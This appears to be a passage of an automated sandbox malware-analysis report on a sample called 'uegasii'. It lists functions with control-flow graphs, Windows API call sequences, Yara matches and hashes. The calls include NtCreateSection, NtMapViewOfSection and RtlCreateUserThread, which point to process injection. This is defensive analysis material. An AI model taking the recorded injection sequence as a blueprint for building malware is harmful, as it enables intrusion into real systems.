                                                                                                                            control_flow_graph 378 401627-40162c 382 401643 378->382 383 401634-401659 call 40127e 378->383 382->383 388 40165b 383->388 389 40165e-401663 383->389 388->389 391 401989-401991 389->391 392 401669-40167a 389->392 391->389 397 401996-4019dd call 40127e 391->397 395 401680-4016a9 392->395 396 401987 392->396 395->396 404 4016af-4016c6 NtDuplicateObject 395->404 396->397 404->396 406 4016cc-4016f0 NtCreateSection 404->406 408 4016f2-401713 NtMapViewOfSection 406->408 409 40174c-401772 NtCreateSection 406->409 408->409 411 401715-401731 NtMapViewOfSection 408->411 409->396 412 401778-40177c 409->412 411->409 414 401733-401749 411->414 412->396 416 401782-4017a3 NtMapViewOfSection 412->416 414->409 416->396 418 4017a9-4017c5 NtMapViewOfSection 416->418 418->396 421 4017cb call 4017d0 418->421
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                            • Opcode Fuzzy Hash: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64
                                                                                                                            Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 423 401641-401659 call 40127e 430 40165b 423->430 431 40165e-401663 423->431 430->431 433 401989-401991 431->433 434 401669-40167a 431->434 433->431 439 401996-4019dd call 40127e 433->439 437 401680-4016a9 434->437 438 401987 434->438 437->438 446 4016af-4016c6 NtDuplicateObject 437->446 438->439 446->438 448 4016cc-4016f0 NtCreateSection 446->448 450 4016f2-401713 NtMapViewOfSection 448->450 451 40174c-401772 NtCreateSection 448->451 450->451 453 401715-401731 NtMapViewOfSection 450->453 451->438 454 401778-40177c 451->454 453->451 456 401733-401749 453->456 454->438 458 401782-4017a3 NtMapViewOfSection 454->458 456->451 458->438 460 4017a9-4017c5 NtMapViewOfSection 458->460 460->438 463 4017cb call 4017d0 460->463
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64
                                                                                                                            Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 494 403103-403127 495 403246-40324b 494->495 496 40312d-403145 494->496 496->495 497 40314b-40315c 496->497 498 40315e-403167 497->498 499 40316c-40317a 498->499 499->499 500 40317c-403183 499->500 501 4031a5-4031ac 500->501 502 403185-4031a4 500->502 503 4031ce-4031d1 501->503 504 4031ae-4031cd 501->504 502->501 505 4031d3-4031d6 503->505 506 4031da 503->506 504->503 505->506 507 4031d8 505->507 506->498 508 4031dc-4031e1 506->508 507->508 508->495 509 4031e3-4031e6 508->509 509->495 510 4031e8-403243 RtlCreateUserThread NtTerminateProcess 509->510 510->495
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5
                                                                                                                            Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 512 403257-40325f 513 4031f0-403243 RtlCreateUserThread NtTerminateProcess 512->513 514 403261-40327f 512->514 515 403246-40324b 513->515 520 403281 514->520 521 403286-403290 514->521 520->521 522 403283-403285 520->522 523 403292 521->523 524 403298-4032ba call 4012ec 521->524 522->521 523->524 526 403293-403297 523->526 530 4032be 524->530 530->530
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
                                                                                                                            Function 0060003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 66 60003c-600047 67 600049 66->67 68 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 66->68 67->68 83 600265-600289 call 600a69 68->83 84 60028b-600292 68->84 89 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 83->89 86 6002a1-6002b0 84->86 88 6002b2-6002cc 86->88 86->89 88->86 95 6003d1-6003e0 89->95 96 6003e2-600437 call 600ce7 95->96 97 600439-6004b8 VirtualFree 95->97 96->95 99 6005f4-6005fe 97->99 100 6004be-6004cd 97->100 103 600604-60060d 99->103 104 60077f-600789 99->104 102 6004d3-6004dd 100->102 102->99 106 6004e3-600505 102->106 103->104 109 600613-600637 103->109 107 6007a6-6007b0 104->107 108 60078b-6007a3 104->108 118 600517-600520 106->118 119 600507-600515 106->119 110 6007b6-6007cb 107->110 111 60086e-6008be LoadLibraryA 107->111 108->107 112 60063e-600648 109->112 115 6007d2-6007d5 110->115 117 6008c7-6008f9 111->117 112->104 113 60064e-60065a 112->113 113->104 116 600660-60066a 113->116 120 600824-600833 115->120 121 6007d7-6007e0 115->121 124 60067a-600689 116->124 126 600902-60091d 117->126 127 6008fb-600901 117->127 128 600526-600547 118->128 119->128 125 600839-60083c 120->125 122 6007e2 121->122 123 6007e4-600822 121->123 122->120 123->115 130 600750-60077a 124->130 131 60068f-6006b2 124->131 125->111 132 60083e-600847 125->132 127->126 129 60054d-600550 128->129 133 6005e0-6005ef 129->133 134 600556-60056b 129->134 130->112 135 6006b4-6006ed 131->135 136 6006ef-6006fc 131->136 137 600849 132->137 138 60084b-60086c 132->138 133->102 140 60056d 134->140 141 60056f-60057a 134->141 135->136 142 60074b 136->142 143 6006fe-600748 136->143 137->111 138->125 140->133 144 60059b-6005bb 141->144 145 60057c-600599 141->145 142->124 143->142 150 6005bd-6005db 144->150 145->150 150->129
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_600000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14
                                                                                                                            Function 00415CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 465 415cf4-415cfb 466 415d00-415d10 465->466 467 415d12 466->467 468 415d18-415d1b 466->468 467->468 468->466 469 415d1d-415d3e LoadLibraryW call 415680 call 415910 468->469 474 415d40-415d47 469->474 475 415d57-415d5d 474->475 476 415d49-415d53 474->476 477 415d64-415d6b 475->477 478 415d5f call 415670 475->478 476->475 480 415d7a-415d81 477->480 481 415d6d-415d74 InterlockedDecrement 477->481 478->477 480->474 483 415d83-415d93 480->483 481->480 484 415da0-415db0 483->484 485 415db2 484->485 486 415db9-415dbc 484->486 485->486 486->484 487 415dbe-415dc9 486->487 488 415dd0-415dd5 487->488 489 415dd7-415ddd 488->489 490 415ddf-415de5 488->490 489->490 491 415de7-415df4 489->491 490->488 490->491
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNELBASE(00417374), ref: 00415D22
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00415D74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlockedLibraryLoad
                                                                                                                            • String ID: @3#v$k`$}$
                                                                                                                            • API String ID: 1728580480-3392953598
                                                                                                                            • Opcode ID: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction ID: e5749c029843646b42c966e7ad9aac78be9f25e1622ba3818e79b170e44d005a
                                                                                                                            • Opcode Fuzzy Hash: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction Fuzzy Hash: B7210830940A50CFC7249B24BD497EA7760EBC8321FA2847BD9499B291C67898C0CB8D
                                                                                                                            Function 00415680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 493 415680-4157c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(004F23E0), ref: 0041575F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00419DC8), ref: 0041579C
                                                                                                                            • VirtualProtect.KERNELBASE(004F2224,004F23DC,00000040,?), ref: 004157BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction ID: 9cbdbad7550f6ba77ebf9f75069ac8a0e3d788a9a6da5ffb341793c156349206
                                                                                                                            • Opcode Fuzzy Hash: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction Fuzzy Hash: AD311960518780CAE305CB78FE647A23AA2EB69704F04807DD5488B3F1D7FE5928C72E
                                                                                                                            Function 00746C0A Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 531 746c0a-746c23 532 746c25-746c27 531->532 533 746c2e-746c3a CreateToolhelp32Snapshot 532->533 534 746c29 532->534 535 746c3c-746c42 533->535 536 746c4a-746c57 Module32First 533->536 534->533 535->536 541 746c44-746c48 535->541 537 746c60-746c68 536->537 538 746c59-746c5a call 7468c9 536->538 542 746c5f 538->542 541->532 541->536 542->537
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00746C32
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00746C52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Offset: 00743000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_743000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 921006f4b6a46a5521da69cdc927ffbdbde0fb2b985e75e2bf3e5e9eb8c49751
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: F1F06235600714ABD7202BF5A9CDB6A76E9EF4A724F100568E682910C0DB74FC454662
                                                                                                                            Function 00600E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 544 600e0f-600e24 SetErrorMode * 2 545 600e26 544->545 546 600e2b-600e2c 544->546 545->546
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_600000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5
                                                                                                                            Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 547 4019c0-4019c6 548 4019e7-401a10 547->548 549 4019c8-4019dd call 40127e 547->549 557 401a13-401a46 call 40127e Sleep call 4014fb 548->557 558 401a09-401a0c 548->558 566 401a55-401a5b 557->566 567 401a48-401a50 call 4015fb 557->567 558->557 570 401a60-401a65 566->570 571 401a69 566->571 567->566 572 401a6c-401a9a call 40127e 570->572 571->570 571->572
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                                            • Opcode Fuzzy Hash: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                            Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                            Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                                            Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                            • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                            Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                            • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                            Function 007468C9 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0074691A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Offset: 00743000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_743000_uegasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 27542dcbb6764b9920c0da2e39f018dd53a69f0775907283ddb108739708e2ff
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 51113C79A00208EFDB01DF98C985E98BBF5EF08351F158094FA489B362D775EA50DF81
                                                                                                                            Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                            • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                            • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
